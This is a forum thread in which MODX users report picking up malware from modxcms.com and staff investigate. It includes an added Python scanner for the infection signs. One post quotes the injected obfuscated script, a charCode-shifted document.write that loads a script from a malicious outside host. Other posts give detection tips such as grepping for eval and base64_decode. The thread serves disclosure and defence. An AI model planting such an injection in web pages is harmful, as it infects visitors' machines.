    • 20574
    • 1 Posts
    Hello,

    My PC was infected two times with malware (fake virus scanner and trojan) by visiting modxcms.com!
    I guess the modx page is infected. I can’t say it 100% but I believe so.
    I reformatted my PC and opened Firefox to visit modxcms.com and I was infected immediately again.

    Then I was searching the web and I’m not alone:
    http://webcache.googleusercontent.com/search?q=cache:8OTyr3N8gM8J:forums.malwarebytes.org/index.php%3Fshowtopic%3D71392+modxcms.com+malware&cd=3&hl=de&ct=clnk&gl=de&source=www.google.de

    Please check this!
    Thanks!
      • 9130
      • 171 Posts
      I can verify this.

      Visiting http://modxcms.com/extras/package/?package=395 pops up an antivirus warning. Looking at the page source shows a suspicious script at the top of the page before the doctype:
      <script type="text/javascript">document.cookie = "d41d8cd98f00b204e9800998ecf8427e="+escape('1297601581.4102092')+"; expires=Tue, 15 Mar 2011 00:00:00; path=/";</script><script type="text/javascript">var j=0; while(j<89) document.write(String.fromCharCode('=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00njtusvtuzip/dp/dd0i1fxp5{yxnwmoirl0#?=0tdsjqu?'.charCodeAt( j++)-1));</script>


      Update: verified that this script prints out a script linked to a malicious website. Don’t try this at home ;)
        • 18913
        • 654 Posts
        This happened to me a couple of weeks ago as well. But at the time I didn’t believe it was the site.
        Matt
        • I can’t find that script on that page. I’m confused! There was an instance months ago where something had been corrupted; could it possibly be cached in an ISP’s proxy?
            Ryan Thrash, MODX Co-Founder
            Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
            • 9130
            • 171 Posts
            I’m not getting it anymore either, but I had seen the same behavior with my own site that was hacked a few months ago. The malware I encountered did some kind of browser and crawler detection to avoid getting the site flagged by Google and used a combination of cookies and random numbers to decide whether to put the script in the page. They are getting clever these days.

            View your cookies for modxcms.com and see if there is one that starts with d41d8cd98f0... that would give you a good clue whether or not something is wrong.

            I suggest you grep the site’s PHP files for 'eval' and 'base64_decode', as those functions are usually used to hide the malware in your files.
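
Added example, not part of any post in this thread: a static check of a saved page for the three signs described above (a script ahead of the doctype, the `d41d8cd98f0...` cookie, and a `document.write(String.fromCharCode(...))` loop), decoding the shifted string without running it. The sample pages and the `injected.example.invalid` host are constructed, and all function names are this example's own.

```python
import re

# Cookie name seen on the page; the value is the MD5 digest of empty input.
COOKIE = "d41d8cd98f00b204e9800998ecf8427e"

# Matches String.fromCharCode('<literal>'.charCodeAt(j++) - N)
SHIFT_RE = re.compile(
    r"String\.fromCharCode\(\s*'((?:[^'\\]|\\.)*)'\s*"
    r"\.charCodeAt\([^)]*\)\s*-\s*(\d+)\s*\)")

def decode_shift(literal, shift):
    """Undo the per-character shift statically, without running the script."""
    return "".join(chr(ord(c) - shift) for c in literal)

def scan_html(html):
    """Return a list of findings for one saved page source."""
    findings = []
    doctype = re.search(r"<!doctype", html, re.I)
    # Only judge "before the doctype" when the page actually has one.
    head = html[:doctype.start()] if doctype else ""
    if re.search(r"<script\b", head, re.I):
        findings.append("script-before-doctype")
    if re.search(r"document\.cookie\s*=\s*[\"']" + COOKIE + "=", html):
        findings.append("cookie-named-md5-of-empty-string")
    for literal, shift in SHIFT_RE.findall(html):
        decoded = decode_shift(literal, int(shift))
        src = re.search(r"src=[\"']?https?://([^/\"'\s>]+)", decoded, re.I)
        if src:
            findings.append("hidden-script-src:" + src.group(1))
    return findings

# Constructed samples: a harmless tag encoded the same way (each char + 1).
_TAG = '<script src="http://injected.example.invalid/x"></script>'
_ENC = "".join(chr(ord(c) + 1) for c in _TAG)
INFECTED = (
    '<script>document.cookie = "' + COOKIE + '="+escape(\'1.0\');</script>'
    "<script>var j=0; while(j<" + str(len(_ENC)) + ") "
    "document.write(String.fromCharCode('" + _ENC + "'.charCodeAt( j++)-1));"
    "</script>\n<!DOCTYPE html><html><body>page</body></html>")
CLEAN = ('<!DOCTYPE html><html><head><script src="/js/site.js"></script>'
         "</head><body>page</body></html>")

if __name__ == "__main__":
    for name, page in (("infected", INFECTED), ("clean", CLEAN)):
        print(name, scan_html(page))
```

Because the injection described here is served only to some visitors, a clean result from one fetch does not clear the site; scanning sources saved from different browsers is more telling.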
              • 18913
              • 654 Posts
              @rthrash : When my colleague first went to the Extras site on an old PC, an error message came up but it didn’t get infected. Not sure why, except that it’s a very old XP box. On a different, newer machine the malware was introduced.

              I just checked and found that a cached version of the MODX page generated on the old machine was still available. I’ll PM you with a screenshot showing the message, which should be useful.



              • Command line wget, Windows XP IE 6, and Mac OS X Safari do not see any of these document.write lines - PM the screenshot to me, if you could, and let me take a look.

                Thanks!

                - Kevin
                  Kevin Marvin :: MODX, LLC
                  • 18913
                  • 654 Posts
                  @rthrash, kevin.marvin : Screenshot sent via email
                    • 23558
                    • 2 Posts
                    PLaton Medical Reply #9, 13 years ago
                    This has happened to me twice in the past couple of weeks, the second time just last night. I googled "Modx random content", followed this link (http://modxcms.com/forums/index.php?topic=47341.0) through to the modx website, and was hit by the defender.exe malware!
                    • *sigh* ... SMF ... this should be fixed again, and will be permanently so when we finally migrate off this forum software.
                        Ryan Thrash, MODX Co-Founder
                        Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me